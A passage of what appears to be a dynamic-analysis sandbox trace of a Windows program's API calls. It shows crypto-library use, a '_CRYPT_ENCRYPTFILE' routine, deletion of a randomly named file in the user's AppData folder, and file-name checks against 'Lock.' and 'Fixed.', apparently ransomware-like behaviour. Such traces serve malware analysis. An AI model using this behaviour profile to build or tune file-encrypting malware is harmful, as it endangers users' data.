(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0229.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0229.077] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.077] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0229.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.324] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.324] FreeLibrary (hLibModule=0x756e0000) returned 1 [0229.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0229.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0229.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.325] CloseHandle (hObject=0x2a0) returned 1 [0229.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0229.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0229.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0229.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0229.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0229.394] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.394] CloseHandle (hObject=0x2d0) returned 1 [0229.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0229.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0229.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.400] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.400] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0229.400] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EdsWI8rB4BywDqnX6.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp", lpFilePart=0x8cedf4*="EdsWI8rB4BywDqnX6.bmp") returned 0x35 [0229.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\edswi8rb4bywdqnx6.bmp")) returned 0x20 [0229.400] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafc9f30, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0xe0f48730, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xe0f48730, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x7028, dwReserved0=0x1, dwReserved1=0x1c, cFileName="EdsWI8rB4BywDqnX6.bmp", cAlternateFileName="EDSWI8~1.BMP")) returned 0xa87590 [0229.401] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\edswi8rb4bywdqnx6.bmp")) returned 1 [0229.540] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafc9f30, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0xe0f48730, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xe0f48730, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x7028, dwReserved0=0x1, dwReserved1=0x1c, cFileName="EdsWI8rB4BywDqnX6.bmp", cAlternateFileName="EDSWI8~1.BMP")) returned 0 [0229.540] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0229.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0229.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0229.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0229.541] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0229.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0229.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0229.547] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0229.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0229.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6c) returned 0x2e564e0 [0229.548] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EdsWI8rB4BywDqnX6.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp", lpFilePart=0x8cf650*="EdsWI8rB4BywDqnX6.bmp") returned 0x35 [0229.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0229.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EdsWI8rB4BywDqnX6.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\edswi8rb4bywdqnx6.bmp")) returned 0xffffffff [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0229.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0229.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0229.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0229.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0229.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0229.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0229.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0229.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eeVXHty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eVXHty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VXHty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XHty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ty18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="18.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0229.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0229.551] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0229.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0229.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0229.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0229.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0229.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0229.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0229.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0229.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0229.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0229.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eeVXHty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eVXHty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VXHty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XHty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ty18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0229.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="18.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0229.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0229.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0229.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0229.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0229.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0229.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0229.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0229.556] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0229.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0229.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0229.556] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 